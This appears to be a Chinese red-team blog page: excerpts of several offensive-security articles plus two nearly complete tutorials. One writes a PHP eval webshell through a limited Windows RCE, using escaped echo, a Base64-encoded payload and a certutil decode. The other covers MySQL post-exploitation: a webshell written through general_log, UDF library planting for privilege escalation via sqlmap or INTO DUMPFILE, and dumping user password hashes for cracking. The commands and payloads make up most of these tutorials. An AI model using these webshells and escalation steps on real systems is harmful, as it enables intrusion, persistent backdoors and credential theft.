从CVE-2025-30208看任意文件读取利用 0# 概述师傅们好久不见！最近不是特别忙，就研究研究最新的漏洞。刚好最近一大批漏洞都爆出来了，比如 CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974 Kubernetes Ingress-Nginx Admission Controller RCE Escalation，是危害性极大的高危漏洞，在内网渗透中能直接击穿K8S集群。这些高危漏洞其实分析文章很多，看国内外众多大佬的分析都非常精彩，这里我也不献丑了。但引起我关注的漏洞是 CVE-2025-30208 Vite Development Server Arbitrary File Read 这个任意文件读取漏洞。其实我们很多时候都轻视了任意文件读取漏洞，特别是很多刚入行学习网安的师傅，往往瞧不上任意文件读取漏洞，其实这是一种偏见。今天就从 CVE-2025-30208 发散去讲任意文件读取漏洞，这种漏洞是有操作空间的，况且 CVE-2025-30208 利用简单、覆盖面广，那就有必要拎出来和大家交流一下，今天我就来抛砖引玉一下。

内网渗透信息搜集骚姿势 0# 概述哈哈，各位师傅好久不见啦，最近比较忙，抽空将本文写出来~说到信息搜集，一般大家都会联想到Web外部打点的暴露面信息搜集。但在内网渗透的过程中，信息搜集也是决定成败的决定性因素特别是做持久化渗透中，对内网的信息搜集是尤其重要的，让我们来看看内网渗透之信息搜集骚姿势。

当无回显RCE碰上Win服务器 0# 概述在日常的渗透过程中，总会碰到一些RCE漏洞，无回显的RCE漏洞更是家常便饭。对于无回显的漏洞利用，网上有不少文章，但我看了半天，都是Linux系统的当无回显RCE漏洞碰上Win服务器，我们又该何去何从呢？故创建本文做个记录本人才疏学浅，如本人有所疏漏，也望各位师傅指点一番

渗透必备：使用Proxifier玩转代理 0# 概述在日常的渗透过程中，不管是前期的外部打点还是后渗透，代理总是绕不开的话题。在前期的外部打点过程中，扫描和渗透测试会不断受到WAF的拦截，需要不停的更换IP进行扫描和渗透测试；而在后期的后渗透过程中，通过Frp和Nps等等工具从入口点出网之后，也需要对接代理进入目标内网进行内网渗透。本文内容是我个人自己摸索出来的，也有可能别的师傅也有类似的方法哈哈。

SQL注入恶劣环境之可执行文件上传骚姿势 0# 概述在前期Web打点成功获得对应权限后，就进入了后渗透（提权、内网渗透、域渗透）的阶段，但是在有些时候，总会出现各种各样奇怪的情况，在此也分享一些经验出来。最近在打红队外援碰到了一个站点存在SQL注入，于是尝试用SqlMap对网站进行注入，发现注入成功，但由此也引发了一系列问题。可能你看完本篇文章，会觉得原理其实很简单。但试问你自己，在面对以下情况的时候，能想到通过这样的手法达成你的目的吗？这就是本文的意义

苛刻条件下:C2上传执行骚姿势 0# 概述在前期Web打点成功获得对应权限后，就进入了后渗透（提权、内网渗透、域渗透）的阶段，但是在有些时候，总会出现各种各样奇怪的情况，在此也分享一些经验出来。最近团队师傅找到我，想要让我帮忙提权一个站点，正好用上了这个骚操作，看网上好像都没有人记录这个手法，这边就浅浅记录一下，希望能帮助到屏幕前面的你。

对于Spring Boot的渗透姿势 0# Spring Boot概述Spring Boot 是由Pivotal团队提供的全新框架，其设计目的是用来简化 Spring 应用的创建、运行、调试、部署等。使用 Spring Boot 可以做到专注于 Spring 应用的开发，而无需过多关注 XML 的配置。Spring Boot 使用“习惯优于配置”的理念，简单来说，它提供了一堆依赖打包，并已经按照使用习惯解决了依赖问题。使用 Spring Boot 可以不用或者只需要很少的 Spring 配置就可以让企业项目快速运行起来。

Web系统的RCE漏洞的Getshell姿势 情景描述今天早上在研究一个Web系统的0Day，虽然是个任意命令执行漏洞，但是这个RCE有些局限，就想通过RCE写个WebShell提提权再看看目标系统：Microsoft Windows Server 2019 Standard动态脚本：PHP 5.6GetShell姿势通常我们写入文件，通常都会使用CMD的echo命令echo 文件内容 > "文件名"假如我们要写php一句话的时候，比如：<?php eval($_POST["aabyss"]); ?>这时候有同学就想到这样不就好了：echo <?php eval($_POST["aabyss"]);?> > "webshell.php"但实际上这样是不行的，因为以下特殊符号是无法直接放入echo语句（执行会提示语法错误或者无法写入这些符号）：& | > < +所以通常我们会把特殊符号通过^来进行转义，比如这样：echo ^<?php eval($_POST["aabyss"]);?^> > "webshell.php"通常就能写入了难点来了但是我早上尝试的那个0day，语句没办法通过^进行转义，或者写入的流量被WAF拦截，怎么办呢？首先，我想到了通过""双引号进行包含进行写入，比如：echo echo "<?php eval($_POST["aabyss"]);?>" > "webshell.php"文件内容如下："<?php eval($_POST["aabyss"]);?>"这样虽然能写入& | > < +这些特殊符号，但是代码最外层带了""，实测php代码是无法执行的于是我又想到了Base64编码进行写入，首先对一句话内容进行base编码：于是得到编码后的Base64字符串，如下：PD9waHAgZXZhbCgkX1BPU1RbImFhYnlzcyJdKTsgID8+但是通过上文，我们发现+也是不能写入的，怎么办呢？这时候插入在外部插入一些数字就能简单解决啦：这时候就得到一份做好的Base64字符串：MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy接下来通过echo将Base64字符串写入TXT文件即可：echo MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy > "base64.txt"接下来通过命令进行解密：certutil -f -decode "base64.txt" "webshell.txt"然后将webshell.txt复制为php文件即可大功告成：copy webshell.txt webshell.php其他一些tips对于Linux系统，可以采用系统命令直接解密Base64来写入：echo 'MTw/cGhwIGV2YWwoJF9QT1NUWyJhYWJ5c3MiXSk7ICA/PjEy' | base64 -d > webshell.php查看当前目录：cd解密Base64文件到上层目录：certutil -f -decode "base64.txt" "../webshell.txt"将命令输入内容写入文件查看：命令 >> out.txt

MySQL不出网文件落地上线姿势 MySQL不出网文件落地上线第一步 判断环境1、查看MySQL版本show variables like '%version%'; select version(); #这个只显示MySQL版本号2、查看load_file() 开启即 secure_file_priv 无限制show variables like '%secure%'; #这条可查看详细信息 show global variables like '%secure_file_priv%';Value说明注意NULL不允许导入或导出在 MySQL 5.5 之前 secure_file_priv 默认是空，这个情况下可以向任意绝对路径写文件/var/lib/mysql-files/只允许在 /var/lib/mysql-files/ 目录导入导出在 MySQL 5.5之后 secure_file_priv 默认是 NULL，这个情况下不可以写文件空不限制目录 而这个MySQL数据库，只允许在/var/lib/mysql-files/这个目录导入导出3、查看日志功能是否开启和对应目录MySQL 5.0 版本以上会创建日志文件，可以通过修改日志的全局变量来 GetshellSHOW VARIABLES LIKE 'general%';注：general_log 默认是关闭的，开启它可以记录用户输入的每条命令，会把其保存在对应的日志文件中开启日志功能set global general_log = "ON"; set global general_log_file='/var/www/html/test.php'; #可以写入WebShell然后直接连接蚁剑 # 往日志里面写入 WebShell select '<?php @eval($_POST['AabyssTeam']);?>'; # 此时已经写到 test.php 文件当中了，注意这个要知道网站的具体路径才可以实现4、寻找插件目录（UDF提权摸排）如果是 MySQL >= 5.1 的版本，必须把 UDF 动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下，才能创建自定义函数动态链接库文件获取在我们常用的工具 SqlMap 和 Metasploit 里面都自带了对应系统的动态链接库文件SqlMap:工具根目录/data/udf/mysql注： SqlMap 自带的动态链接库为防止被误杀，都经过编码处理，不能被直接使用不过可以利用 SqlMap 自带的解码工具 cloak.py 来解码使用，cloak.py 的位置为：工具根目录/extra/cloak/cloak.pyMetasploit:工具根目录/embedded/framework/data/exploits/mysql注：动态链接库就是实现共享函数库概念的一种方式，在Windows环境下后缀名为 .dll，在Linux环境下后缀名为 .so接下来的任务是把 UDF 动态链接库文件放到 MySQL 的插件目录下，可以使用如下的 SQL 语句来查询：show variables like '%plugin%';第二步 MySQL提权写入动态链接库写入动态链接库可以分为下面几种情形：存在SQL 注入且是高权限plugin（插件） 目录可写且需要 secure_file_priv 无限制MySQL 插件目录可以被 MySQL 用户写入1、存在SQL注入这个时候就可以直接使用 SqlMap 来上传动态链接库注：因为 GET 有字节长度限制，所以往往使用 POST 注入来写入sqlmap -u "http://Web服务的URL" --data="id=注入点" --file-write="根据本地的文件目录来写/lib_mysqludf_sys_64.so" --file-dest="/usr/lib64/mysql/plugin/（上面探测出来的插件目录）udf.so"2、不存在SQL注入就像我举的例子一样，没有Web服务，只有一个Java应用怎么办？我们可以使用 SQL 语句执行写入，前提是 secure_file_priv 无限制，可以手工写文件到 plugin 目录下# 直接 SELECT 查询十六进制写入 SELECT 0x（通过16进制转换后的动态链接库字符串） INTO DUMPFILE '/usr/lib64/mysql/plugin/udf.so'; # 解码十六进制再写入多此一举 SELECT unhex('（通过16进制转换后的动态链接库字符串）') INTO DUMPFILE '/usr/lib64/mysql/plugin/udf.so';当出现这个报错的时候：由于 secure-file-priv 变量的默认设置为 /var/lib/mysql-files/ 引起的，该值意味着只能导出到指定目录下，否则会报错小技巧：获取MySQL账户和对应密码Hash# MySQL <= 5.6 版本 select host, user, password from mysql.user; # MySQL >= 5.7 版本 select host,user,authentication_string from mysql.user;直接丢到在线网站 https://www.cmd5.com/ 解密直接可以解密了密码，解密不出来就用Hashcat跑就行了